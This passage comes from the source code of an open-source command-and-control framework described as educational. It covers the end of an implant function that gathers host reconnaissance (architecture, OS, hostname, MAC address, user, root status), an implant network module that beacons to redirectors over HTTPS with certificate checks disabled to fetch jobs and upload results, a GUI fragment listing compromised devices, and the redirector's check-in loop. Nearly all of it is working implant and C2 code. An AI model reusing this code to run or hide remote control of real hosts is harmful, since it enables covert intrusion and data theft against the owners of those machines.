	sizeArch := C.arch((*C.char)(ptrArch))
	bArch := C.GoBytes(ptrArch, sizeArch)
	arch = arch + string(bArch)


	ptrOsv := C.malloc(C.sizeof_char * 1024)
	defer C.free(unsafe.Pointer(ptrOsv))
	sizeOsv := C.osv((*C.char)(ptrOsv))
	bOsv := C.GoBytes(ptrOsv, sizeOsv)
	osv = string(bOsv)


	//Hostname
	hostname, err = os.Hostname()
	if err != nil {
		return true, "Error Getting Hostname:" + err.Error()
	}


	//Mac
	addrs, erri := net.InterfaceAddrs()

	if erri != nil {
		return true, "Error Getting Mac:" + erri.Error()
	}

	var currentIP, currentNetworkHardwareName string

	for _, address := range addrs {

		// check the address type and if it is not a loopback then record it
		// = GET LOCAL IP ADDRESS (every match overwrites currentIP, so the last one wins)
		if ipnet, ok := address.(*net.IPNet); ok && !ipnet.IP.IsLoopback() {
			if ipnet.IP.To4() != nil {
				currentIP = ipnet.IP.String()
			}
		}
	}

	// net.Interfaces error is discarded. If no IPv4 address was found above,
	// currentIP is "" and strings.Contains matches every address, so the last
	// interface with any address is picked.
	interfaces, _ := net.Interfaces()
	for _, interf := range interfaces {
		if addrs, err := interf.Addrs(); err == nil {
			for _, addr := range addrs {
				// only interested in the name with current IP address
				if strings.Contains(addr.String(), currentIP) {
					currentNetworkHardwareName = interf.Name
				}
			}
		}
	}

	netInterface, errm := net.InterfaceByName(currentNetworkHardwareName)
	if errm != nil {
		return true, "Error Getting Mac:" + errm.Error()
	}

	mac = netInterface.HardwareAddr.String()

	//User
	actualUserO, errU := user.Current()

	// NOTE(review): errU is the error being tested, but the message is built
	// from err, which is nil at this point (os.Hostname succeeded), so this
	// branch panics on a nil pointer instead of reporting the failure.
	if errU != nil {
		return true, "Error Getting User:" + err.Error()
	}
	actualUser = actualUserO.Username

	//privileges: a plain username comparison, not an euid check
	if actualUser == "root" {
		privileges = "root"
	} else {
		privileges = "No root"
	}

	sysinfo := SysInfo{pid, arch, oss, osv, hostname, mac, actualUser, privileges}
	bufRP := new(bytes.Buffer)
	json.NewEncoder(bufRP).Encode(sysinfo)
	resultRP := bufRP.String()
	return false, resultRP
}
--------------------------------------------------------------------------------
/src/bichito/modules/network/https_selfsigned_GO.go:
--------------------------------------------------------------------------------
// +build selfsignedhttpsgo
//// Listening Network Module for Redirectors ///////////////////////////////////////////////////////////
//
// Network Method: Egress to an https Golang Server redirector, using a self-signed certificate. The implant will not check the target TLS fingerprint.
//
// Warnings: Will work with MITM TLS proxies, because the server certificate is not verified.
//
// Fingerprint: GO-LANG Client TLS Fingerprint
//
// IOC Level: Medium
//
//
///////////////////////////////////////////////////////////////////////////////////////////////////////


package network

import (

	"crypto/tls"
	"bytes"
	"net/http"
	"encoding/json"
	"io/ioutil"
	"time"
	"net"
)

/*
JSON Structures for Compiling Redirectors Network Module parameters
Hive will have the same definitions in: ./src/hive/hiveImplants.go
*/
type BiSelfSignedhttps struct {
	Port        string   `json:"port"`
	Redirectors []string `json:"redirectors"`
}

// moduleParams is filled by PrepareNetworkMocule and read by nothing else in
// this file after that call.
var moduleParams *BiSelfSignedhttps

/*
Description: SelfSignedhttps,Prepare Redirector Slice
Flow:
	A.JSON Decode redirector data
	B.Loop over each redirector and craft a working https endpoint to connect to
*/
// PrepareNetworkMocule decodes jsonstring into moduleParams and returns each
// redirector as "host:port". A decode error yields a nil slice, and the error
// itself is not surfaced to the caller.
func PrepareNetworkMocule(jsonstring string) []string {

	var redirectors []string
	errDaws := json.Unmarshal([]byte(jsonstring), &moduleParams)
	if errDaws != nil {
		return redirectors
	}
	for _, red := range moduleParams.Redirectors {
		redirectors = append(redirectors, red + ":" + moduleParams.Port)
	}

	return redirectors
}

/*
Description: SelfSignedhttps,Retrieve Jobs
Flow:
	A.Prepare https client, configure the client to accept self-signed certificates
	B.Get request against target redirector to retrieve jobs
*/
// RetrieveJobs polls one redirector for pending jobs with a GET to
// https://<redirector>/image.jpg, sending authentication verbatim as the
// Authorization header. Returns (body, status): on a transport error the body
// is nil and status carries the error text; otherwise status is "Success" and
// body is whatever the server returned, whatever its HTTP status code.
func RetrieveJobs(redirector string, authentication string) ([]byte, string) {

	var newJobs []byte
	var error string

	//HTTP Clients Conf
	client := &http.Client{
		Transport: &http.Transport{
			DialContext: (&net.Dialer{
				Timeout:   10 * time.Second,
				KeepAlive: 10 * time.Second,
			}).DialContext,

			//Skip TLS Verify since we are using self signed Certs.
			// NOTE(review): this also disables hostname verification, so the
			// client accepts any certificate presented at redirector:port; the
			// MITM warning in the file header follows directly from this line.
			TLSClientConfig: (&tls.Config{
				InsecureSkipVerify: true,
			}),

			TLSHandshakeTimeout:   20 * time.Second,
			ExpectContinueTimeout: 10 * time.Second,
			ResponseHeaderTimeout: 10 * time.Second,
		},

		Timeout: 30 * time.Second,
	}

	// The NewRequest error is discarded; a malformed redirector string would
	// leave req nil and panic on the Header.Set below.
	req, _ := http.NewRequest("GET", "https://"+redirector+"/image.jpg", nil)
	req.Header.Set("Authorization", authentication)
	res, err := client.Do(req)
	if err != nil {
		error = "Connection errir with redirector " + redirector + ":" + err.Error()
		return newJobs, error
	}

	// NOTE(review): res.Body is never closed and the ReadAll error is dropped,
	// so a truncated read is indistinguishable from an empty job list and the
	// connection is not handed back to the transport for reuse. The response
	// StatusCode is not checked either.
	newJobs, _ = ioutil.ReadAll(res.Body)
	return newJobs, "Success"
}

/*
Description: SelfSignedhttps,Send Jobs
Flow:
	A.Prepare https client, configure the client to accept self-signed certificates
	B.POST request against target redirector to send a job
*/
// SendJobs POSTs encodedJob to https://<redirector>/upload with authentication
// as the Authorization header and returns "Success" or a connection-error
// message. Only transport errors are reported: the response, including a
// non-2xx status, is discarded without being read or closed.
func SendJobs(redirector string, authentication string, encodedJob []byte) string {

	var error string

	//HTTP Clients Conf
	client := &http.Client{
		Transport: &http.Transport{
			DialContext: (&net.Dialer{
				Timeout:   10 * time.Second,
				KeepAlive: 10 * time.Second,
			}).DialContext,

			//Skip TLS Verify since we are using self signed Certs (same caveat as RetrieveJobs)
			TLSClientConfig: (&tls.Config{
				InsecureSkipVerify: true,
			}),

			TLSHandshakeTimeout:   10 * time.Second,
			ExpectContinueTimeout: 4 * time.Second,
			ResponseHeaderTimeout: 3 * time.Second,
		},

		Timeout: 20 * time.Second,
	}

	// NewRequest error discarded, as in RetrieveJobs.
	req, _ := http.NewRequest("POST", "https://"+redirector+"/upload", bytes.NewBuffer(encodedJob))
	req.Header.Set("Authorization", authentication)

	// The *http.Response is dropped here, so its Body is never closed.
	_, err := client.Do(req)
	if err != nil {
		error = "Connection error with redirector " + redirector + ":" + err.Error()
		return error
	}

	return "Success"
}
--------------------------------------------------------------------------------
/src/client/electronGUI/components/bichito/bichito.html: -------------------------------------------------------------------------------- 1 |

Bichito/Device Information

ID | PID | Arch | Op. System | OS Version | Hostname
MAC Addr. | User Name | Admin/ROOT? | Last Seen | Redirector/Last Attached | Status

Attacks

124 | 125 | -------------------------------------------------------------------------------- /src/redirector/redirector.go: -------------------------------------------------------------------------------- 1 | //{{{{{{{ Redirector Main Function }}}}}}} 2 | //By Rebujacker - Alvaro Folgado Rueda as an open source educative project 3 | 4 | 5 | package main 6 | 7 | import ( 8 | "strings" 9 | "os" 10 | "encoding/json" 11 | "bytes" 12 | "time" 13 | "fmt" 14 | "sync" 15 | ) 16 | 17 | /* 18 | JSON Structures for Compiling Redirectors and Implants (Bichito) 19 | These JSON structure will be passed to the go compiling process to provide most of the configurations related to which modules are active. 20 | Hive will have the same definitions in: ./src/hive/hiveImplants.go 21 | */ 22 | 23 | //Compiling-time JSON-Encoded Configurations for Redirector 24 | type RedConfig struct { 25 | Roaster string `json:"roaster"` 26 | HiveFingenprint string `json:"hivefingenprint"` 27 | Token string `json:"token"` 28 | BiToken string `json:"bitoken"` 29 | Saas string `json:"saas"` 30 | Offline string `json:"offline"` 31 | Coms string `json:"coms"` 32 | } 33 | 34 | type RedAuth struct { 35 | Domain string `json:"domain"` 36 | Token string `json:"token"` 37 | } 38 | 39 | 40 | /* 41 | This JSON Object definition is needed in the redirector to wrap within Jobs the RID of the redirector (same definition) 42 | Hive will have the same definitions in: ./src/hive/hiveDB.go 43 | */ 44 | type Job struct { 45 | Cid string `json:"cid"` // The client CID triggered the job 46 | Jid string `json:"jid"` // The Job Id (J-), useful to avoid replaying attacks 47 | Pid string `json:"pid"` // Parent Id, when the job came completed from a Implant, Pid is the Redirector where it cames from 48 | Chid string `json:"chid"` // Implant Id 49 | Job string `json:"job"` // Job Name 50 | Time string `json:"time"` // Time of creation 51 | Status string `json:"status"` // Sent - Processing - Finished 52 | Result string 
`json:"result"` // Job output data 53 | Parameters string `json:"parameters"` // Parameters will be JSON serialized to provide flexibility 54 | } 55 | 56 | 57 | //Redirector "on-memory" Job slices to manage Jobs that are being sent to Hive, or to an Implant 58 | type JobsToHive struct { 59 | mux sync.RWMutex 60 | Jobs []*Job 61 | } 62 | 63 | type JobsToBichito struct { 64 | mux sync.RWMutex 65 | Jobs []*Job 66 | } 67 | 68 | type lockObject struct { 69 | mux sync.RWMutex 70 | Lock int 71 | } 72 | 73 | var lock *lockObject 74 | 75 | 76 | //On Compile variables: 77 | /* 78 | parameters --> JSON Encoded String with all Redirector and Network Module data 79 | redconfig --> JSON Object where parameters will be decoded to 80 | authbearer --> Redirector JSON Object Credentials for the header 81 | rid --> Redirector RID 82 | jobsToHive --> Jobs to Hive on memory slice 83 | jobsToBichito --> Jobs to Implants on memory slice 84 | */ 85 | var( 86 | parameters string 87 | redconfig *RedConfig 88 | authbearer string 89 | rid string 90 | 91 | jobsToHive *JobsToHive 92 | jobsToBichito *JobsToBichito 93 | ) 94 | 95 | /* 96 | Description: Redirector Main Function 97 | Flow: 98 | A.Decode On compiled JSON string with redirector configurations 99 | B.Get the Server Hostname. 100 | B1. If the redirector is a SaaS//Offline, the hostname need to be pre-set 101 | C.Encode the Authenthication Header for login to Hive 102 | D.Initialize the "on-memory" Slices for the Jobs to be sent to Hive or to be sent to Implants connected 103 | E.Start the checking routine against hive to fet the RID 104 | F.Once the check-in is completed, start the target "network module" handler to receive/query Implants connections. The Function to 105 | execute will depend of the network module selected. 
*/
// main wires the redirector up in the order the comment above describes and
// never returns: after check-in it hands control to bichitoHandler(), which
// is defined elsewhere, as is checking().
func main() {

	//Decode Redirector Parameters.
	// NOTE(review): on an Unmarshal error redconfig stays nil; the branch
	// below only prints, and the Saas/Offline checks then dereference
	// redconfig, so a bad compile-time parameter string ends in a nil-pointer
	// panic rather than a clean exit.
	errDaws := json.Unmarshal([]byte(parameters), &redconfig)
	//Create authbearer for redirector checking and authorization process with Hive
	hostname, errorH := os.Hostname()
	if (errorH != nil) || (errDaws != nil) {
		//This should create error logs, but have not even made checking yet
		// (Println appends its own newline, so the literal "\n" prints a blank line)
		fmt.Println("Error on parameters JSon decoding or getting hostname\n")
	}

	// Saas/Offline deployments identify themselves by the configured name
	// instead of the machine hostname; Saas wins when both are set.
	if redconfig.Saas != "" {
		hostname = redconfig.Saas
	} else if redconfig.Offline != "" {
		hostname = redconfig.Offline
	}



	// authbearer becomes the JSON form of RedAuth{hostname, Token} with the
	// trailing newline json.Encoder appends stripped; the Encode error is not checked.
	authbearerO := RedAuth{hostname, redconfig.Token}
	bufRP := new(bytes.Buffer)
	json.NewEncoder(bufRP).Encode(authbearerO)
	resultRP := bufRP.String()
	authbearer = resultRP
	authbearer = strings.TrimSuffix(authbearer, "\n")

	//Initialize on memory slices for redirect Jobs (both start from the same nil slice)
	var jobs []*Job
	jobsToHive = &JobsToHive{Jobs: jobs}
	jobsToBichito = &JobsToBichito{Jobs: jobs}
	lock = &lockObject{Lock: 0}

	// Keep pinging Hive each 5 seconds till check-in is done.
	// Success is detected only by the returned string containing "R-"; any
	// other value is treated as a failure message and printed. There is no
	// retry limit, so an unreachable Hive keeps this loop running forever.
	for {
		rid = checking()
		if strings.Contains(rid, "R-") {
			break
		}
		fmt.Println("Checking failed:" + rid)
		time.Sleep(5 * time.Second)
	}

	//Once Hive check-in is performed, start the network module handler (will change between modules)
	bichitoHandler()
}
--------------------------------------------------------------------------------